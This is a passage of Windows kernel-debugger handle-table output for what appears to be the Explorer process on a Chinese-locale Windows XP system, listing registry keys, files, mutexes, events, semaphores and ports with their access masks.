        HandleCount: 9  PointerCount: 522
        Directory Object: 00000000  Name: Default

002c: Object: 80e5b160  GrantedAccess: 000f037f
Object: 80e5b160  Type: (80f0d560) WindowStation
    ObjectHeader: 80e5b148
        HandleCount: 17  PointerCount: 30
        Directory Object: e14fb640  Name: WinSta0

0030: Object: e14ce6c8  GrantedAccess: 0002000f
Object: e14ce6c8  Type: (80f44ca0) Directory
    ObjectHeader: e14ce6b0
        HandleCount: 16  PointerCount: 185
        Directory Object: e1000640  Name: BaseNamedObjects

0034: Object: 80e22558  GrantedAccess: 00100020
Object: 80e22558  Type: (80f42e70) File
    ObjectHeader: 80e22540
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0038: Object: e17b1b38  GrantedAccess: 000f003f (Protected)
Object: e17b1b38  Type: (80f0a350) Key
    ObjectHeader: e17b1b20
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003

003c: Object: e1690fb8  GrantedAccess: 000f003f (Protected)
Object: e1690fb8  Type: (80f0a350) Key
    ObjectHeader: e1690fa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003_CLASSES

0040: Object: ffb2b7b0  GrantedAccess: 00100020
Object: ffb2b7b0  Type: (80f42e70) File
    ObjectHeader: ffb2b798
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0044: Object: ffb6e4a0  GrantedAccess: 00100020
Object: ffb6e4a0  Type: (80f42e70) File
    ObjectHeader: ffb6e488
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0048: Object: e1692fb8  GrantedAccess: 000f003f
Object: e1692fb8  Type: (80f0a350) Key
    ObjectHeader: e1692fa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

004c: Object: ffb2b478  GrantedAccess: 00100020
Object: ffb2b478  Type: (80f42e70) File
    ObjectHeader: ffb2b460
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0050: Object: e1712a20  GrantedAccess: 00020019
Object: e1712a20  Type: (80f0a350) Key
    ObjectHeader: e1712a08
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS

NT\CURRENTVERSION\DRIVERS32

0054: Object: ffb29cd8  GrantedAccess: 001f0001
Object: ffb29cd8  Type: (80f0d040) Mutant
    ObjectHeader: ffb29cc0
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: ExplorerIsShellMutex

0058: Object: 80d57920  GrantedAccess: 00120001
Object: 80d57920  Type: (80f0d040) Mutant
    ObjectHeader: 80d57908
        HandleCount: 7  PointerCount: 8
        Directory Object: e14ce6c8  Name: ShimCacheMutex

005c: Object: e1536670  GrantedAccess: 00000002
Object: e1536670  Type: (80f0a040) Section
    ObjectHeader: e1536658
        HandleCount: 7  PointerCount: 8
        Directory Object: e14ce6c8  Name: ShimSharedMemory

0060: Object: ffb75d98  GrantedAccess: 001f0003
Object: ffb75d98  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb75d80
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: shell.{210A4BA0-3AEA-1069-A2D9-08002B30309D}

0064: Object: ffb274a0  GrantedAccess: 00100001
Object: ffb274a0  Type: (80f42e70) File
    ObjectHeader: ffb27488
        HandleCount: 1  PointerCount: 1

0068: Object: e1693560  GrantedAccess: 000f003f
Object: e1693560  Type: (80f0a350) Key
    ObjectHeader: e1693548
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name:

\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

006c: Object: e1557160  GrantedAccess: 000f003f
Object: e1557160  Type: (80f0a350) Key
    ObjectHeader: e1557148
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

0070: Object: ffb2a138  GrantedAccess: 001f0003
Object: ffb2a138  Type: (80f0e490) Event
    ObjectHeader: ffb2a120
        HandleCount: 1  PointerCount: 2

0074: Object: e155b8b8  GrantedAccess: 000f003f
Object: e155b8b8  Type: (80f0a350) Key
    ObjectHeader: e155b8a0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES

0078: Object: e155b850  GrantedAccess: 000f003f
Object: e155b850  Type: (80f0a350) Key
    ObjectHeader: e155b838
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

007c: Object: ffb2a108  GrantedAccess: 001f0003
Object: ffb2a108  Type: (80f0e490) Event
    ObjectHeader: ffb2a0f0
        HandleCount: 1  PointerCount: 2

0080: Object: e13c86a0  GrantedAccess: 00000010
Object: e13c86a0  Type: (80f0a350) Key
    ObjectHeader: e13c8688
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

0084: Object: ffb2a0d8  GrantedAccess: 001f0003
Object: ffb2a0d8  Type: (80f0e490) Event
    ObjectHeader: ffb2a0c0
        HandleCount: 1  PointerCount: 2

0088: Object: e17124e0  GrantedAccess: 000f003f
Object: e17124e0  Type: (80f0a350) Key
    ObjectHeader: e17124c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES

008c: Object: ffb2a0a8  GrantedAccess: 001f0003
Object: ffb2a0a8  Type: (80f0e490) Event
    ObjectHeader: ffb2a090
        HandleCount: 1  PointerCount: 2

0090: Object: e178ac78  GrantedAccess: 00000010
Object: e178ac78  Type: (80f0a350) Key
    ObjectHeader: e178ac60
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

0094: Object: ffb2a060  GrantedAccess: 001f0003
Object: ffb2a060  Type: (80f0e490) Event
    ObjectHeader: ffb2a048
        HandleCount: 1  PointerCount: 1

0098: Object: e17c0e88  GrantedAccess: 000f003f
Object: e17c0e88  Type: (80f0a350) Key
    ObjectHeader: e17c0e70
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

009c: Object: ffb25f88  GrantedAccess: 001f0003
Object: ffb25f88  Type: (80f0e490) Event
    ObjectHeader: ffb25f70
        HandleCount: 1  PointerCount: 2

00a0: Object: e17c0e20  GrantedAccess: 000f003f
Object: e17c0e20  Type: (80f0a350) Key
    ObjectHeader: e17c0e08
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00a4: Object: ffb25f40  GrantedAccess: 001f0003
Object: ffb25f40  Type: (80f0e490) Event
    ObjectHeader: ffb25f28
        HandleCount: 1  PointerCount: 2

00a8: Object: e17c0db8  GrantedAccess: 000f003f
Object: e17c0db8  Type: (80f0a350) Key
    ObjectHeader: e17c0da0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID

00ac: Object: ffb25ec0  GrantedAccess: 001f0003
Object: ffb25ec0  Type: (80f0e490) Event
    ObjectHeader: ffb25ea8
        HandleCount: 1  PointerCount: 2

00b0: Object: e17c0d50  GrantedAccess: 000f003f
Object: e17c0d50  Type: (80f0a350) Key
    ObjectHeader: e17c0d38
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES

00b4: Object: ffb25e40  GrantedAccess: 001f0003
Object: ffb25e40  Type: (80f0e490) Event
    ObjectHeader: ffb25e28
        HandleCount: 1  PointerCount: 2

00b8: Object: e1557020  GrantedAccess: 000f003f
Object: e1557020  Type: (80f0a350) Key
    ObjectHeader: e1557008
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00bc: Object: ffb25dc0  GrantedAccess: 001f0003
Object: ffb25dc0  Type: (80f0e490) Event
    ObjectHeader: ffb25da8
        HandleCount: 1  PointerCount: 2

00c0: Object: e1557300  GrantedAccess: 00000010
Object: e1557300  Type: (80f0a350) Key
    ObjectHeader: e15572e8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

00c4: Object: ffb25d40  GrantedAccess: 001f0003
Object: ffb25d40  Type: (80f0e490) Event
    ObjectHeader: ffb25d28
        HandleCount: 1  PointerCount: 1

00c8: Object: e1557298  GrantedAccess: 000f003f
Object: e1557298  Type: (80f0a350) Key
    ObjectHeader: e1557280
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00cc: Object: ffb25cc0  GrantedAccess: 001f0003
Object: ffb25cc0  Type: (80f0e490) Event
    ObjectHeader: ffb25ca8
        HandleCount: 1  PointerCount: 2

00d0: Object: e1557230  GrantedAccess: 000f003f
Object: e1557230  Type: (80f0a350) Key
    ObjectHeader: e1557218
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00d4: Object: ffb25c40  GrantedAccess: 001f0003
Object: ffb25c40  Type: (80f0e490) Event
    ObjectHeader: ffb25c28
        HandleCount: 1  PointerCount: 2

00d8: Object: e15571c8  GrantedAccess: 000f003f
Object: e15571c8  Type: (80f0a350) Key
    ObjectHeader: e15571b0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID

00dc: Object: ffb25bc0  GrantedAccess: 001f0003
Object: ffb25bc0  Type: (80f0e490) Event
    ObjectHeader: ffb25ba8
        HandleCount: 1  PointerCount: 2

00e0: Object: e1a1cf40  GrantedAccess: 00000004
Object: e1a1cf40  Type: (80f0a040) Section
    ObjectHeader: e1a1cf28
        HandleCount: 5  PointerCount: 6
        Directory Object: e14ce6c8  Name: __R_000000000007_SMem__

00e4: Object: ffb2acd0  GrantedAccess: 001f0003
Object: ffb2acd0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb2acb8
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: shell.{090851A5-EB96-11D2-8BE4-00C04FA31A66}

00e8: Object: ffb2afe0  GrantedAccess: 001f0001
Object: ffb2afe0  Type: (80f0d040) Mutant
    ObjectHeader: ffb2afc8
        HandleCount: 1  PointerCount: 1

00ec: Object: ffb2af50  GrantedAccess: 00100020
Object: ffb2af50  Type: (80f42e70) File
    ObjectHeader: ffb2af38
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

00f0: Object: ffb59990  GrantedAccess: 00100003
Object: ffb59990  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb59978
        HandleCount: 1  PointerCount: 1

00f4: Object: ffb25cf0  GrantedAccess: 00100003
Object: ffb25cf0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb25cd8
        HandleCount: 1  PointerCount: 1

00f8: Object: ffbba468  GrantedAccess: 001f0003
Object: ffbba468  Type: (80f0dca0) Semaphore
    ObjectHeader: ffbba450
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: shell.{A48F1A32-A340-11D1-BC6B-00A0C90312E1}

00fc: Object: e1552ce8  GrantedAccess: 0002001f
Object: e1552ce8  Type: (80f0a350) Key
    ObjectHeader: e1552cd0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\PLUS!\THEMES\APPLY

0100: Object: ffb2b718  GrantedAccess: 00100020
Object: ffb2b718  Type: (80f42e70) File
    ObjectHeader: ffb2b700
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0104: Object: e180c570  GrantedAccess: 001f0001
Object: e180c570  Type: (80f430b0) Port
    ObjectHeader: e180c558
        HandleCount: 1  PointerCount: 1

0108: Object: e1555850  GrantedAccess: 0002001f
Object: e1555850  Type: (80f0a350) Key
    ObjectHeader: e1555838
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES

010c: Object: e1553240  GrantedAccess: 0002001f
Object: e1553240  Type: (80f0a350) Key
    ObjectHeader: e1553228
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES\27

0110: Object: e1554308  GrantedAccess: 0002001f
Object: e1554308  Type: (80f0a350) Key
    ObjectHeader: e15542f0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES\27

0114: Object: e16a4978  GrantedAccess: 0002001f
Object: e16a4978  Type: (80f0a350) Key
    ObjectHeader: e16a4960
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES\27\SIZES\0

0118: Object: ffb25ab0  GrantedAccess: 001f0003
Object: ffb25ab0  Type: (80f0e490) Event
    ObjectHeader: ffb25a98
        HandleCount: 1  PointerCount: 1

011c: Object: e1550020  GrantedAccess: 001f0001
Object: e1550020  Type: (80f430b0) Port
    ObjectHeader: e1550008
        HandleCount: 1  PointerCount: 1

0120: Object: ffb220c8  GrantedAccess: 001f0003
Object: ffb220c8  Type: (80f0e490) Event
    ObjectHeader: ffb220b0
        HandleCount: 1  PointerCount: 1

0124: Object: ffb220f8  GrantedAccess: 001f0003
Object: ffb220f8  Type: (80f0e490) Event
    ObjectHeader: ffb220e0
        HandleCount: 1  PointerCount: 1

0128: Object: ffb22e50  GrantedAccess: 001f0003
Object: ffb22e50  Type: (80f0e490) Event
    ObjectHeader: ffb22e38
        HandleCount: 1  PointerCount: 1

012c: Object: ffb67490  GrantedAccess: 001f03ff
Object: ffb67490  Type: (80f44528) Thread
    ObjectHeader: ffb67478
        HandleCount: 2  PointerCount: 4

0130: Object: e1550200  GrantedAccess: 001f0001
Object: e1550200  Type: (80f430b0) Port
    ObjectHeader: e15501e8
        HandleCount: 1  PointerCount: 1

0134: Object: ffb22e20  GrantedAccess: 001f0003
Object: ffb22e20  Type: (80f0e490) Event
    ObjectHeader: ffb22e08
        HandleCount: 1  PointerCount: 1

0138: Object: e16b48d8  GrantedAccess: 001f0001
Object: e16b48d8  Type: (80f430b0) Port
    ObjectHeader: e16b48c0
        HandleCount: 1  PointerCount: 12
        Directory Object: e12745a8  Name: OLE4

013c: Object: ffb269d8  GrantedAccess: 001f0003
Object: ffb269d8  Type: (80f42040) IoCompletion
    ObjectHeader: ffb269c0
        HandleCount: 2  PointerCount: 8

0140: Object: ffb6d3d8  GrantedAccess: 001f0003
Object: ffb6d3d8  Type: (80f42040) IoCompletion
    ObjectHeader: ffb6d3c0
        HandleCount: 1  PointerCount: 1

0144: Object: ffb269d8  GrantedAccess: 001f0003
Object: ffb269d8  Type: (80f42040) IoCompletion
    ObjectHeader: ffb269c0
        HandleCount: 2  PointerCount: 8

0148: Object: ffb21cd8  GrantedAccess: 001f03ff
Object: ffb21cd8  Type: (80f44528) Thread
    ObjectHeader: ffb21cc0
        HandleCount: 2  PointerCount: 3

014c: Object: ffb21fc0  GrantedAccess: 001f0003
Object: ffb21fc0  Type: (80f0e490) Event
    ObjectHeader: ffb21fa8
        HandleCount: 1  PointerCount: 1

0150: Object: e155b258  GrantedAccess: 000f003f
Object: e155b258  Type: (80f0a350) Key
    ObjectHeader: e155b240
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY\P3SITES

0154: Object: e169d4d0  GrantedAccess: 000f003f
Object: e169d4d0  Type: (80f0a350) Key
    ObjectHeader: e169d4b8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY\P3GLOBAL

0158: Object: ffb21060  GrantedAccess: 001f0003
Object: ffb21060  Type: (80f0e490) Event
    ObjectHeader: ffb21048
        HandleCount: 1  PointerCount: 1

015c: Object: ffb21948  GrantedAccess: 001f03ff
Object: ffb21948  Type: (80f44528) Thread
    ObjectHeader: ffb21930
        HandleCount: 2  PointerCount: 4

0160: Object: ffb20f70  GrantedAccess: 001f0003 (Protected)
Object: ffb20f70  Type: (80f0e490) Event
    ObjectHeader: ffb20f58
        HandleCount: 1  PointerCount: 2

0164: Object: ffb206a8  GrantedAccess: 001f0003
Object: ffb206a8  Type: (80f0e490) Event
    ObjectHeader: ffb20690
        HandleCount: 1  PointerCount: 3

0168: Object: ffb205f0  GrantedAccess: 001f0003
Object: ffb205f0  Type: (80f0dad0) Timer
    ObjectHeader: ffb205d8
        HandleCount: 1  PointerCount: 2

016c: Object: ffb205c0  GrantedAccess: 001f0003 (Protected)
Object: ffb205c0  Type: (80f0e490) Event
    ObjectHeader: ffb205a8
        HandleCount: 1  PointerCount: 1

0170: Object: e169f768  GrantedAccess: 0000001b
Object: e169f768  Type: (80f0a350) Key
    ObjectHeader: e169f750
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\HTTP\SHELL

0174: Object: ffb20328  GrantedAccess: 001f03ff
Object: ffb20328  Type: (80f44528) Thread
    ObjectHeader: ffb20310
        HandleCount: 2  PointerCount: 3

0178: Object: ffb24f78  GrantedAccess: 001f0003
Object: ffb24f78  Type: (80f42040) IoCompletion
    ObjectHeader: ffb24f60
        HandleCount: 1  PointerCount: 3

017c: Object: ffb25790  GrantedAccess: 001f0003
Object: ffb25790  Type: (80f0dad0) Timer
    ObjectHeader: ffb25778
        HandleCount: 1  PointerCount: 2

0180: Object: ffb1cda8  GrantedAccess: 001f03ff
Object: ffb1cda8  Type: (80f44528) Thread
    ObjectHeader: ffb1cd90
        HandleCount: 2  PointerCount: 3

0184: Object: e169f7f0  GrantedAccess: 000f0007
Object: e169f7f0  Type: (80f0a040) Section
    ObjectHeader: e169f7d8
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CiceroSharedMemDefaultS-1-5-21-1390067357-

776561741-839522115-1003

0188: Object: ffb21c98  GrantedAccess: 001f0001
Object: ffb21c98  Type: (80f0d040) Mutant
    ObjectHeader: ffb21c80
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.LBES.MutexDefaultS-1-5-21-1390067357-

776561741-839522115-1003

018c: Object: ffb263d8  GrantedAccess: 001f0001
Object: ffb263d8  Type: (80f0d040) Mutant
    ObjectHeader: ffb263c0
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.Compart.MutexDefaultS-1-5-21-1390067357-

776561741-839522115-1003

0190: Object: ffb26388  GrantedAccess: 001f0001
Object: ffb26388  Type: (80f0d040) Mutant
    ObjectHeader: ffb26370
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.Asm.MutexDefaultS-1-5-21-1390067357-776561741

-839522115-1003

0194: Object: ffb26338  GrantedAccess: 001f0001
Object: ffb26338  Type: (80f0d040) Mutant
    ObjectHeader: ffb26320
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.Layouts.MutexDefaultS-1-5-21-1390067357-

776561741-839522115-1003

0198: Object: ffb20270  GrantedAccess: 001f0001
Object: ffb20270  Type: (80f0d040) Mutant
    ObjectHeader: ffb20258
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.TMD.MutexDefaultS-1-5-21-1390067357-776561741

-839522115-1003

019c: Object: e172ff00  GrantedAccess: 00020019
Object: e172ff00  Type: (80f0a350) Key
    ObjectHeader: e172fee8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NLS\LOCALE

01a0: Object: e172fa58  GrantedAccess: 00020019
Object: e172fa58  Type: (80f0a350) Key
    ObjectHeader: e172fa40
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NLS\LOCALE\ALTERNATE SORTS

01a4: Object: e16b57e0  GrantedAccess: 00020019
Object: e16b57e0  Type: (80f0a350) Key
    ObjectHeader: e16b57c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NLS\LANGUAGE GROUPS

01a8: Object: 80dfd8c0  GrantedAccess: 001f0003
Object: 80dfd8c0  Type: (80f0e490) Event
    ObjectHeader: 80dfd8a8
        HandleCount: 7  PointerCount: 8
        Directory Object: e14ce6c8  Name: userenv:  User Profile setup event

01ac: Object: 80e265c8  GrantedAccess: 00100001
Object: 80e265c8  Type: (80f42e70) File
    ObjectHeader: 80e265b0
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\桌面 {HarddiskVolume1}

01b0: Object: ffbb7818  GrantedAccess: 001f0003
Object: ffbb7818  Type: (80f0dca0) Semaphore
    ObjectHeader: ffbb7800
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: shell.{7CB834F0-527B-11D2-9D1F-0000F805CA57}

01b4: Object: ffb18020  GrantedAccess: 00000002
Object: ffb18020  Type: (80f44528) Thread
    ObjectHeader: ffb18008
        HandleCount: 4  PointerCount: 6

01b8: Object: ffb20160  GrantedAccess: 001f0003
Object: ffb20160  Type: (80f0e490) Event
    ObjectHeader: ffb20148
        HandleCount: 1  PointerCount: 1

01bc: Object: ffb20130  GrantedAccess: 001f0003 (Protected)
Object: ffb20130  Type: (80f0e490) Event
    ObjectHeader: ffb20118
        HandleCount: 1  PointerCount: 3

01c0: Object: ffb200d0  GrantedAccess: 001f0003
Object: ffb200d0  Type: (80f0e490) Event
    ObjectHeader: ffb200b8
        HandleCount: 1  PointerCount: 1

01c4: Object: ffb18020  GrantedAccess: 001f03ff
Object: ffb18020  Type: (80f44528) Thread
    ObjectHeader: ffb18008
        HandleCount: 4  PointerCount: 6

01c8: Object: ffb21490  GrantedAccess: 001f0003
Object: ffb21490  Type: (80f0e490) Event
    ObjectHeader: ffb21478
        HandleCount: 1  PointerCount: 1

01cc: Object: ffb21410  GrantedAccess: 001f0003
Object: ffb21410  Type: (80f0e490) Event
    ObjectHeader: ffb213f8
        HandleCount: 1  PointerCount: 1

01d0: Object: ffb58b70  GrantedAccess: 001f0003
Object: ffb58b70  Type: (80f0e490) Event
    ObjectHeader: ffb58b58
        HandleCount: 1  PointerCount: 1

01d4: Object: 80e27e98  GrantedAccess: 0012019f
Object: 80e27e98  Type: (80f42e70) File
    ObjectHeader: 80e27e80
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \lsarpc {NamedPipe}

01d8: Object: ffb58b28  GrantedAccess: 001f0003 (Protected)
Object: ffb58b28  Type: (80f0e490) Event
    ObjectHeader: ffb58b10
        HandleCount: 1  PointerCount: 2

01dc: Object: e1759ab8  GrantedAccess: 001f0001
Object: e1759ab8  Type: (80f430b0) Port
    ObjectHeader: e1759aa0
        HandleCount: 1  PointerCount: 1

01e0: Object: ffb16f90  GrantedAccess: 00100001
Object: ffb16f90  Type: (80f42e70) File
    ObjectHeader: ffb16f78
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\Local

Settings\Application Data\Microsoft\CD Burning {HarddiskVolume1}

01e4: Object: ffb172a8  GrantedAccess: 00100001
Object: ffb172a8  Type: (80f42e70) File
    ObjectHeader: ffb17290
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\All Users\桌面

{HarddiskVolume1}

01e8: Object: ffafb7e8  GrantedAccess: 00100020
Object: ffafb7e8  Type: (80f42e70) File
    ObjectHeader: ffafb7d0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

01ec: Object: ffb1b9e8  GrantedAccess: 001f0003
Object: ffb1b9e8  Type: (80f0e490) Event
    ObjectHeader: ffb1b9d0
        HandleCount: 1  PointerCount: 1

01f0: Object: ffb22bd8  GrantedAccess: 001f0003
Object: ffb22bd8  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb22bc0
        HandleCount: 1  PointerCount: 1

01f4: Object: e13ca1d8  GrantedAccess: 000f003f (Protected)
Object: e13ca1d8  Type: (80f0a350) Key
    ObjectHeader: e13ca1c0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

01f8: Object: ffb20190  GrantedAccess: 001f0003
Object: ffb20190  Type: (80f0e490) Event
    ObjectHeader: ffb20178
        HandleCount: 1  PointerCount: 1

01fc: Object: ffb1b9b8  GrantedAccess: 001f0003
Object: ffb1b9b8  Type: (80f0e490) Event
    ObjectHeader: ffb1b9a0
        HandleCount: 1  PointerCount: 2

0200: Object: ffb16ec0  GrantedAccess: 001f0003
Object: ffb16ec0  Type: (80f0e490) Event
    ObjectHeader: ffb16ea8
        HandleCount: 1  PointerCount: 2

0204: Object: e173e2f8  GrantedAccess: 000f003f
Object: e173e2f8  Type: (80f0a350) Key
    ObjectHeader: e173e2e0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID

0208: Object: e1768158  GrantedAccess: 000f003f
Object: e1768158  Type: (80f0a350) Key
    ObjectHeader: e1768140
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELL

020c: Object: ffbba468  GrantedAccess: 001f0003
Object: ffbba468  Type: (80f0dca0) Semaphore
    ObjectHeader: ffbba450
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: shell.{A48F1A32-A340-11D1-BC6B-00A0C90312E1}

0210: Object: e1768088  GrantedAccess: 00020019
Object: e1768088  Type: (80f0a350) Key
    ObjectHeader: e1768070
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

0214: Object: ffb1d938  GrantedAccess: 001f0003
Object: ffb1d938  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb1d920
        HandleCount: 1  PointerCount: 1

0218: Object: ffb21bc0  GrantedAccess: 001f0003 (Protected)
Object: ffb21bc0  Type: (80f0e490) Event
    ObjectHeader: ffb21ba8
        HandleCount: 1  PointerCount: 2

021c: Object: e176afb8  GrantedAccess: 000f003f
Object: e176afb8  Type: (80f0a350) Key
    ObjectHeader: e176afa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS

0220: Object: e176af50  GrantedAccess: 000f003f
Object: e176af50  Type: (80f0a350) Key
    ObjectHeader: e176af38
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM

0224: Object: e176a360  GrantedAccess: 000f003f
Object: e176a360  Type: (80f0a350) Key
    ObjectHeader: e176a348
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE

0228: Object: ffb134c0  GrantedAccess: 0012019f
Object: ffb134c0  Type: (80f42e70) File
    ObjectHeader: ffb134a8
        HandleCount: 1  PointerCount: 1
